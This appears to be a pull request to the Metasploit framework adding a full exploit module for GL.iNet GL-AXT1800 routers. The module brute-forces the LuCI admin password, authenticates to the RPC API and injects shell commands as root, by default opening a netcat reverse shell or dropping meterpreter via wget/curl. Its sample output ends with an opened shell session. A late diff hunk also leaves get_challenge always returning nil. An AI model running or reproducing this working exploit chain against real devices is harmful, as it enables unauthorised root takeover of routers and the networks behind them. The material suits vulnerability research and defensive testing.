### PR TITLE
Add GL.iNet router auth bypass to RCE exploit chain

### DIFF
--- a/modules/auxiliary/scanner/http/glinet_login.rb
+++ b/modules/auxiliary/scanner/http/glinet_login.rb
@@ -81,6 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
+        'DefaultOptions'  => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' },
         'Privileged'      => true,
         'DisclosureDate'  => '2025-11-16',
         'DefaultTarget'   => 0,

--- a/modules/exploits/linux/http/glinet_rce.rb
+++ b/modules/exploits/linux/http/glinet_rce.rb
@@ -1,0 +1,476 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'GL.iNet Router Auth Bypass to RCE',
+        'Description'    => %q{
+          This module exploits two vulnerabilities in GL.iNet routers (GL-AXT1800 Slate AX)
+          running firmware <= 4.6.8 to achieve unauthenticated remote code execution.
+
+          CVE-2025-67090: The LuCI web interface lacks rate limiting, allowing brute-force
+          attacks against the admin password.
+
+          CVE-2025-67089: The RPC API plugin handler passes user input unsanitized to a
+          shell command, allowing authenticated command injection as root.
+
+          Chaining these vulnerabilities allows an unauthenticated attacker on the local
+          network to obtain a root shell.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Aleksa Zatezalo'  # Discovery and Metasploit module
+        ],
+        'References'     => [
+          ['CVE', '2025-67090'],
+          ['CVE', '2025-67089'],
+          ['CWE', '307'],  # Improper Restriction of Excessive Authentication Attempts
+          ['CWE', '78'],   # OS Command Injection
+          ['URL', 'https://www.gl-inet.com/security/']
+        ],
+        'Platform'       => ['unix', 'linux'],
+        'Arch'           => [ARCH_CMD],
+        'Targets'        => [
+          [
+            'Unix Command',
+            {
+              'Platform'    => 'unix',
+              'Arch'        => ARCH_CMD,
+              'Type'        => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform'    => 'linux',
+              'Arch'        => [ARCH_AARCH64, ARCH_ARMLE],
+              'Type'        => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged'     => true,
+        'DisclosureDate' => '2025-11-16',
+        'DefaultTarget'  => 0,
+        'Notes'          => {
+          'Stability'    => [CRASH_SAFE],
+          'Reliability'  => [REPEATABLE_SESSION],
+          'SideEffects'  => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('USERNAME', [true, 'Admin username', 'root']),
+      OptString.new('PASSWORD', [false, 'Admin password (if known)']),
+      OptPath.new('PASS_FILE', [false, 'Wordlist for brute-force', nil]),
+      OptInt.new('BRUTEFORCE_SPEED', [true, 'Brute-force delay (0-5, lower=faster)', 0])   ])
+  end
+
+  # ===========================================================================
+  # Reconnaissance
+  # ===========================================================================
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => '/'
+    })
+
+    unless res
+      return CheckCode::Unknown('Target did not respond')
+    end
+
+    # GL.iNet routers identify themselves in various ways
+    if res.body.include?('gl-inet') || res.body.include?('GL.iNet') || res.body.include?('gl.inet')
+      # Try to get a challenge to confirm RPC is available
+      challenge = get_challenge(datastore['USERNAME'])
+      if challenge
+        return CheckCode::Appears('GL.iNet router with RPC interface detected')
+      end
+      return CheckCode::Detected('GL.iNet router detected, RPC status unknown')
+    end
+
+    CheckCode::Safe('Target does not appear to be a GL.iNet router')
+  end
+
+  # ===========================================================================
+  # Authentication - GL.iNet Challenge/Response
+  # ===========================================================================
+
+  def get_challenge(username)
+    payload = {
+      'jsonrpc' => '2.0',
+      'id'      => 1,
+      'method'  => 'challenge',
+      'params'  => { 'username' => username }
+    }
+
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => '/rpc',
+      'ctype'   => 'application/json',
+      'data'    => payload.to_json
+    })
+
+    return nil unless res&.code == 200
+
+    begin
+      json = JSON.parse(res.body)
+      return json['result'] if json['result']
+    rescue JSON::ParserError
+      return nil
+    end
+
+    nil
+  end
+
+  def compute_auth_hash(username, password, challenge)
+    salt  = challenge['salt']
+    nonce = challenge['nonce']
+    alg   = challenge['alg']
+
+    # Compute password hash using Unix crypt variants
+    pw_hash = case alg
+              when 1  # MD5 crypt
+                md5_crypt(password, salt)
+              when 5  # SHA-256 crypt
+                sha_crypt(password, salt, 256, 5000)
+              when 6  # SHA-512 crypt
+                sha_crypt(password, salt, 512, 5000)
+              else
+                fail_with(Failure::Unknown, "Unsupported hash algorithm: #{alg}")
+              end
+
+    # Final auth hash: MD5(username:pw_hash:nonce)
+    combined = "#{username}:#{pw_hash}:#{nonce}"
+    Digest::MD5.hexdigest(combined)
+  end
+
+  # ---------------------------------------------------------------------------
+  # Unix Crypt Implementations
+  # ---------------------------------------------------------------------------
+
+  B64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
+
+  def b64_encode(data, order)
+    result = ''
+    order.each do |indices|
+      value = indices.each_with_index.sum { |idx, i| (data[idx] || 0) << (8 * i) }
+      4.times do
+        result << B64[value & 0x3f]
+        value >>= 6
+      end
+    end
+    result
+  end
+
+  def md5_crypt(password, salt)
+    # Implementation of MD5-crypt ($1$)
+    salt = salt[0, 8]
+    ctx = Digest::MD5.new
+    ctx << password << '$1$' << salt
+
+    alt_ctx = Digest::MD5.new
+    alt_ctx << password << salt << password
+    alt_hash = alt_ctx.digest
+
+    password.length.times { |i| ctx << alt_hash[i % 16] }
+
+    len = password.length
+    while len > 0
+      ctx << ((len & 1) == 1 ? "\x00" : password[0])
+      len >>= 1
+    end
+
+    hash = ctx.digest
+
+    1000.times do |i|
+      new_ctx = Digest::MD5.new
+      new_ctx << ((i & 1) == 1 ? password : hash)
+      new_ctx << salt if (i % 3) != 0
+      new_ctx << password if (i % 7) != 0
+      new_ctx << ((i & 1) == 1 ? hash : password)
+      hash = new_ctx.digest
+    end
+
+    order = [[0, 6, 12], [1, 7, 13], [2, 8, 14], [3, 9, 15], [4, 10, 5]]
+    encoded = ''
+    order.each do |a, b, c|
+      value = (hash[a].ord << 16) | (hash[b].ord << 8) | hash[c].ord
+      4.times { encoded << B64[value & 0x3f]; value >>= 6 }
+    end
+    value = hash[11].ord
+    2.times { encoded << B64[value & 0x3f]; value >>= 6 }
+
+    "$1$#{salt}$#{encoded}"
+  end
+
+  def sha_crypt(password, salt, bits, rounds)
+    # Implementation of SHA-256/512 crypt ($5$/$6$)
+    digest_class = bits == 256 ? Digest::SHA256 : Digest::SHA512
+    hash_len = bits / 8
+    prefix = bits == 256 ? '$5$' : '$6$'
+
+    salt = salt[0, 16]
+    pwd = password.b
+
+    # Initial hash
+    ctx_a = digest_class.new
+    ctx_a << pwd << salt
+
+    ctx_b = digest_class.new
+    ctx_b << pwd << salt << pwd
+    hash_b = ctx_b.digest
+
+    pwd.length.times { |i| ctx_a << hash_b[i % hash_len] }
+
+    len = pwd.length
+    while len > 0
+      ctx_a << ((len & 1) == 1 ? hash_b : pwd)
+      len >>= 1
+    end
+    hash_a = ctx_a.digest
+
+    # P sequence
+    ctx_p = digest_class.new
+    pwd.length.times { ctx_p << pwd }
+    hash_p = ctx_p.digest
+    p_seq = (pwd.length / hash_len).times.map { hash_p }.join + hash_p[0, pwd.length % hash_len]
+
+    # S sequence
+    ctx_s = digest_class.new
+    (16 + hash_a[0].ord).times { ctx_s << salt }
+    hash_s = ctx_s.digest
+    s_seq = hash_s[0, salt.length]
+
+    # Main rounds
+    hash_c = hash_a
+    rounds.times do |i|
+      ctx = digest_class.new
+      ctx << ((i & 1) == 1 ? p_seq : hash_c)
+      ctx << s_seq if (i % 3) != 0
+      ctx << p_seq if (i % 7) != 0
+      ctx << ((i & 1) == 1 ? hash_c : p_seq)
+      hash_c = ctx.digest
+    end
+
+    # Encode result
+    encoded = encode_sha_result(hash_c, bits)
+    "#{prefix}#{salt}$#{encoded}"
+  end
+
+  def encode_sha_result(hash, bits)
+    if bits == 256
+      order = [[0, 10, 20], [21, 1, 11], [12, 22, 2], [3, 13, 23], [24, 4, 14],
+               [15, 25, 5], [6, 16, 26], [27, 7, 17], [18, 28, 8], [9, 19, 29], [31, 30]]
+    else
+      order = [[0, 21, 42], [22, 43, 1], [44, 2, 23], [3, 24, 45], [25, 46, 4],
+               [47, 5, 26], [6, 27, 48], [28, 49, 7], [50, 8, 29], [9, 30, 51],
+               [31, 52, 10], [53, 11, 32], [12, 33, 54], [34, 55, 13], [56, 14, 35],
+               [15, 36, 57], [37, 58, 16], [59, 17, 38], [18, 39, 60], [40, 61, 19],
+               [62, 20, 41], [63]]
+    end
+
+    result = ''
+    order.each do |indices|
+      if indices.length == 3
+        value = (hash[indices[0]].ord << 16) | (hash[indices[1]].ord << 8) | hash[indices[2]].ord
+        4.times { result << B64[value & 0x3f]; value >>= 6 }
+      else
+        value = hash[indices[0]].ord
+        2.times { result << B64[value & 0x3f]; value >>= 6 }
+      end
+    end
+    result
+  end
+
+  def do_login(username, password)
+    challenge = get_challenge(username)
+    unless challenge
+      vprint_error('Failed to obtain authentication challenge')
+      return nil
+    end
+
+    auth_hash = compute_auth_hash(username, password, challenge)
+
+    payload = {
+      'jsonrpc' => '2.0',
+      'id'      => 2,
+      'method'  => 'login',
+      'params'  => {
+        'username' => username,
+        'hash'     => auth_hash
+      }
+    }
+
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => '/rpc',
+      'ctype'   => 'application/json',
+      'data'    => payload.to_json
+    })
+
+    return nil unless res&.code == 200
+
+    begin
+      json = JSON.parse(res.body)
+      if json['result'] && json['result']['sid']
+        return json['result']['sid']
+      end
+    rescue JSON::ParserError
+      return nil
+    end
+
+    nil
+  end
+
+  # ===========================================================================
+  # Brute-Force - CVE-2025-67090
+  # ===========================================================================
+
+  def try_luci_login(username, password)
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => '/cgi-bin/luci',
+      'ctype'    => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'luci_username' => username,
+        'luci_password' => password
+      }
+    }, 10)
+
+    # 302 redirect indicates successful login
+    res&.code == 302
+  end
+
+  def run_bruteforce(username, wordlist_path)
+    print_status('Stage 1: Brute-forcing password via LuCI (CVE-2025-67090)')
+
+    unless File.exist?(wordlist_path)
+      fail_with(Failure::BadConfig, "Wordlist not found: #{wordlist_path}")
+    end
+
+    passwords = File.readlines(wordlist_path, chomp: true).reject(&:empty?)
+    print_status("Loaded #{passwords.length} passwords from wordlist")
+
+    passwords.each_with_index do |password, idx|
+      # Progress indicator
+      if (idx % 100).zero? && idx > 0
+        vprint_status("Tried #{idx}/#{passwords.length} passwords...")
+      end
+
+      if try_luci_login(username, password)
+        print_good("Password found: #{password}")
+        return password
+      end
+
+      # Optional delay based on BRUTEFORCE_SPEED
+      sleep(0.1 * datastore['BRUTEFORCE_SPEED']) if datastore['BRUTEFORCE_SPEED'] > 0
+    end
+
+    nil
+  end
+
+  # ===========================================================================
+  # Exploitation - CVE-2025-67089
+  # ===========================================================================
+
+  # CmdStager callback - injects command via vulnerable RPC endpoint
+  def execute_command(cmd, opts = {})
+    sid = opts[:sid] || @session_id
+
+    # Wrap command in backticks for shell injection
+    payload = "`#{cmd}`"
+
+    rpc_payload = {
+      'jsonrpc' => '2.0',
+      'id'      => 11,
+      'method'  => 'call',
+      'params'  => [sid, 'plugins', 'install_package', { 'name' => [payload] }]
+    }
+
+    send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => '/rpc',
+      'ctype'   => 'application/json',
+      'cookie'  => "Admin-Token=#{sid}",
+      'data'    => rpc_payload.to_json
+    }, 5)  # Short timeout - shell may cause hang
+  end
+
+  def send_payload(sid)
+    print_status('Stage 3: Injecting payload via plugin handler (CVE-2025-67089)')
+    @session_id = sid
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded, sid: sid)
+    when :linux_dropper
+      execute_cmdstager(flavor: :wget)
+    end
+  end
+
+  # ===========================================================================
+  # Main Exploit Flow
+  # ===========================================================================
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    print_status("Target: #{rhost}:#{rport}")
+
+    # Stage 1: Get password (brute-force or provided)
+    if password.blank?
+      if datastore['PASS_FILE'].blank?
+        fail_with(Failure::BadConfig, 'PASSWORD or PASS_FILE required')
+      end
+      password = run_bruteforce(username, datastore['PASS_FILE'])
+      unless password
+        fail_with(Failure::NoAccess, 'Brute-force failed - no valid password found')
+      end
+    else
+      print_status("Using provided password: #{password}")
+    end
+
+    # Stage 2: Authenticate to RPC API
+    print_status('Stage 2: Authenticating to RPC API')
+    @session_id = do_login(username, password)
+
+    unless @session_id
+      fail_with(Failure::NoAccess, 'Authentication failed')
+    end
+    print_good('Session obtained')
+
+    # Store credentials
+    store_valid_credential(
+      user: username,
+      private: password,
+      private_type: :password,
+      proof: @session_id
+    )
+
+    # Stage 3: Command injection
+    send_payload(@session_id)
+    print_good('Payload delivered - check handler')
+  end
+end

--- a/modules/exploits/linux/http/glinet_rce.rb
+++ b/modules/exploits/linux/http/glinet_rce.rb
@@ -367,7 +367,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'luci_username' => username,
         'luci_password' => password
       }
-    }, 10)
+    })
 
     # 302 redirect indicates successful login
     res&.code == 302

--- a/modules/exploits/linux/http/glinet_rce.rb
+++ b/modules/exploits/linux/http/glinet_rce.rb
@@ -39,8 +39,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CWE', '78'],   # OS Command Injection
           ['URL', 'https://www.gl-inet.com/security/']
         ],
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Unix Command',

--- a/modules/exploits/linux/http/glinet_rce.rb
+++ b/modules/exploits/linux/http/glinet_rce.rb
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => 'GL.iNet Router Auth Bypass to RCE',
-        'Description'    => %q{
+        'Name' => 'GL.iNet Router Auth Bypass to RCE',
+        'Description' => %q{
           This module exploits two vulnerabilities in GL.iNet routers (GL-AXT1800 Slate AX)
           running firmware <= 4.6.8 to achieve unauthenticated remote code execution.
 
@@ -28,26 +28,26 @@ class MetasploitModule < Msf::Exploit::Remote
           Chaining these vulnerabilities allows an unauthenticated attacker on the local
           network to obtain a root shell.
         },
-        'License'        => MSF_LICENSE,
-        'Author'         => [
-          'Aleksa Zatezalo'  # Discovery and Metasploit module
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Aleksa Zatezalo' # Discovery and Metasploit module
         ],
-        'References'     => [
+        'References' => [
           ['CVE', '2025-67090'],
           ['CVE', '2025-67089'],
           ['CWE', '307'],  # Improper Restriction of Excessive Authentication Attempts
           ['CWE', '78'],   # OS Command Injection
           ['URL', 'https://www.gl-inet.com/security/']
         ],
-        'Platform'       => ['unix', 'linux'],
-        'Arch'           => [ARCH_CMD],
-        'Targets'        => [
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
           [
             'Unix Command',
             {
-              'Platform'    => 'unix',
-              'Arch'        => ARCH_CMD,
-              'Type'        => :unix_cmd,
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/unix/reverse_netcat'
               }
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Linux Dropper',
             {
-              'Platform'    => 'linux',
-              'Arch'        => [ARCH_AARCH64, ARCH_ARMLE],
-              'Type'        => :linux_dropper,
+              'Platform' => 'linux',
+              'Arch' => [ARCH_AARCH64, ARCH_ARMLE],
+              'Type' => :linux_dropper,
               'CmdStagerFlavor' => ['wget', 'curl'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp'
@@ -66,13 +66,13 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        'Privileged'     => true,
+        'Privileged' => true,
         'DisclosureDate' => '2025-11-16',
-        'DefaultTarget'  => 0,
-        'Notes'          => {
-          'Stability'    => [CRASH_SAFE],
-          'Reliability'  => [REPEATABLE_SESSION],
-          'SideEffects'  => [IOC_IN_LOGS]
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )
@@ -82,7 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'Admin username', 'root']),
       OptString.new('PASSWORD', [false, 'Admin password (if known)']),
       OptPath.new('PASS_FILE', [false, 'Wordlist for brute-force', nil]),
-      OptInt.new('BRUTEFORCE_SPEED', [true, 'Brute-force delay (0-5, lower=faster)', 0])   ])
+      OptInt.new('BRUTEFORCE_SPEED', [true, 'Brute-force delay (0-5, lower=faster)', 0])
+    ])
   end
 
   # ===========================================================================
@@ -92,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => '/'
+      'uri' => '/'
     })
 
     unless res
@@ -106,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if challenge
         return CheckCode::Appears('GL.iNet router with RPC interface detected')
       end
+
       return CheckCode::Detected('GL.iNet router detected, RPC status unknown')
     end
 
@@ -119,16 +121,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_challenge(username)
     payload = {
       'jsonrpc' => '2.0',
-      'id'      => 1,
-      'method'  => 'challenge',
-      'params'  => { 'username' => username }
+      'id' => 1,
+      'method' => 'challenge',
+      'params' => { 'username' => username }
     }
 
     res = send_request_cgi({
-      'method'  => 'POST',
-      'uri'     => '/rpc',
-      'ctype'   => 'application/json',
-      'data'    => payload.to_json
+      'method' => 'POST',
+      'uri' => '/rpc',
+      'ctype' => 'application/json',
+      'data' => payload.to_json
     })
 
     return nil unless res&.code == 200
@@ -144,9 +146,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def compute_auth_hash(username, password, challenge)
-    salt  = challenge['salt']
+    salt = challenge['salt']
     nonce = challenge['nonce']
-    alg   = challenge['alg']
+    alg = challenge['alg']
 
     # Compute password hash using Unix crypt variants
     pw_hash = case alg
@@ -216,10 +218,16 @@ class MetasploitModule < Msf::Exploit::Remote
     encoded = ''
     order.each do |a, b, c|
       value = (hash[a].ord << 16) | (hash[b].ord << 8) | hash[c].ord
-      4.times { encoded << B64[value & 0x3f]; value >>= 6 }
+      4.times do
+        encoded << B64[value & 0x3f]
+        value >>= 6
+      end
     end
     value = hash[11].ord
-    2.times { encoded << B64[value & 0x3f]; value >>= 6 }
+    2.times do
+      encoded << B64[value & 0x3f]
+      value >>= 6
+    end
 
     "$1$#{salt}$#{encoded}"
   end
@@ -280,24 +288,34 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def encode_sha_result(hash, bits)
     if bits == 256
-      order = [[0, 10, 20], [21, 1, 11], [12, 22, 2], [3, 13, 23], [24, 4, 14],
-               [15, 25, 5], [6, 16, 26], [27, 7, 17], [18, 28, 8], [9, 19, 29], [31, 30]]
+      order = [
+        [0, 10, 20], [21, 1, 11], [12, 22, 2], [3, 13, 23], [24, 4, 14],
+        [15, 25, 5], [6, 16, 26], [27, 7, 17], [18, 28, 8], [9, 19, 29], [31, 30]
+      ]
     else
-      order = [[0, 21, 42], [22, 43, 1], [44, 2, 23], [3, 24, 45], [25, 46, 4],
-               [47, 5, 26], [6, 27, 48], [28, 49, 7], [50, 8, 29], [9, 30, 51],
-               [31, 52, 10], [53, 11, 32], [12, 33, 54], [34, 55, 13], [56, 14, 35],
-               [15, 36, 57], [37, 58, 16], [59, 17, 38], [18, 39, 60], [40, 61, 19],
-               [62, 20, 41], [63]]
+      order = [
+        [0, 21, 42], [22, 43, 1], [44, 2, 23], [3, 24, 45], [25, 46, 4],
+        [47, 5, 26], [6, 27, 48], [28, 49, 7], [50, 8, 29], [9, 30, 51],
+        [31, 52, 10], [53, 11, 32], [12, 33, 54], [34, 55, 13], [56, 14, 35],
+        [15, 36, 57], [37, 58, 16], [59, 17, 38], [18, 39, 60], [40, 61, 19],
+        [62, 20, 41], [63]
+      ]
     end
 
     result = ''
     order.each do |indices|
       if indices.length == 3
         value = (hash[indices[0]].ord << 16) | (hash[indices[1]].ord << 8) | hash[indices[2]].ord
-        4.times { result << B64[value & 0x3f]; value >>= 6 }
+        4.times do
+          result << B64[value & 0x3f]
+          value >>= 6
+        end
       else
         value = hash[indices[0]].ord
-        2.times { result << B64[value & 0x3f]; value >>= 6 }
+        2.times do
+          result << B64[value & 0x3f]
+          value >>= 6
+        end
       end
     end
     result
@@ -314,19 +332,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     payload = {
       'jsonrpc' => '2.0',
-      'id'      => 2,
-      'method'  => 'login',
-      'params'  => {
+      'id' => 2,
+      'method' => 'login',
+      'params' => {
         'username' => username,
-        'hash'     => auth_hash
+        'hash' => auth_hash
       }
     }
 
     res = send_request_cgi({
-      'method'  => 'POST',
-      'uri'     => '/rpc',
-      'ctype'   => 'application/json',
-      'data'    => payload.to_json
+      'method' => 'POST',
+      'uri' => '/rpc',
+      'ctype' => 'application/json',
+      'data' => payload.to_json
     })
 
     return nil unless res&.code == 200
@@ -349,9 +367,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def try_luci_login(username, password)
     res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => '/cgi-bin/luci',
-      'ctype'    => 'application/x-www-form-urlencoded',
+      'method' => 'POST',
+      'uri' => '/cgi-bin/luci',
+      'ctype' => 'application/x-www-form-urlencoded',
       'vars_post' => {
         'luci_username' => username,
         'luci_password' => password
@@ -403,18 +421,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     rpc_payload = {
       'jsonrpc' => '2.0',
-      'id'      => 11,
-      'method'  => 'call',
-      'params'  => [sid, 'plugins', 'install_package', { 'name' => [payload] }]
+      'id' => 11,
+      'method' => 'call',
+      'params' => [sid, 'plugins', 'install_package', { 'name' => [payload] }]
     }
 
     send_request_cgi({
-      'method'  => 'POST',
-      'uri'     => '/rpc',
-      'ctype'   => 'application/json',
-      'cookie'  => "Admin-Token=#{sid}",
-      'data'    => rpc_payload.to_json
-    }, 5)  # Short timeout - shell may cause hang
+      'method' => 'POST',
+      'uri' => '/rpc',
+      'ctype' => 'application/json',
+      'cookie' => "Admin-Token=#{sid}",
+      'data' => rpc_payload.to_json
+    }, 5) # Short timeout - shell may cause hang
   end
 
   def send_payload(sid)

--- a/modules/exploits/linux/http/glinet_rce.rb
+++ b/modules/exploits/linux/http/glinet_rce.rb
@@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/json',
       'cookie' => "Admin-Token=#{sid}",
       'data' => rpc_payload.to_json
-    }, 5) # Short timeout - shell may cause hang
+    }, nil) # Short timeout - shell may cause hang
   end
 
   def send_payload(sid)

--- a/modules/exploits/linux/http/glinet_rce.rb
+++ b/modules/exploits/linux/http/glinet_rce.rb
@@ -133,12 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return nil unless res&.code == 200
 
-    begin
-      json = JSON.parse(res.body)
-      return json['result'] if json['result']
-    rescue JSON::ParserError
-      return nil
-    end
+    json = res.get_json_document
 
     nil
   end


### PR DESCRIPTION
## Summary

Adds an exploit module for GL.iNet GL-AXT1800 (Slate AX) routers that chains two vulnerabilities for unauthenticated RCE (found by me).

## Vulnerabilities

| CVE | Type | Description |
|-----|------|-------------|
| CVE-2025-67090 | Auth Bypass | No rate limiting on LuCI login |
| CVE-2025-67089 | Command Injection | Unsanitized input in plugin handler |

## Verification

- [x] I have tested this on a real device
- [x] `msftidy.rb` passes

Verification screenshot below:
<img width="883" height="246" alt="Screenshot_2026-02-01_23-04-45" src="https://github.com/user-attachments/assets/7f1ad27d-34e5-43eb-bf7c-c14f3b15796b" />


### Module Output
```
msf6> use exploit/linux/http/glinet_rce
msf6 exploit(...)> set RHOSTS 192.168.8.1
msf6 exploit(...)> set LHOST 192.168.8.x
msf6 exploit(...)> set PASS_FILE wordlist.txt
msf6 exploit(...)> run

[*] Stage 1: Brute-forcing password via LuCI (CVE-2025-67090)
[*] Loaded 4 passwords from wordlist
[+] Password found: xxxxx
[*] Stage 2: Authenticating to RPC API
[+] Session obtained
[*] Stage 3: Injecting payload via plugin handler (CVE-2025-67089)
[+] Payload delivered - check handler
[*] Command shell session 1 opened
```

## References

- Disclosure: [[Aleksa's security advisory]](https://medium.com/@aleksazatezalo/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51)
- Exploit: [[Original Python Exploit]](https://github.com/AleksaZatezalo/glinet-1800-rce)
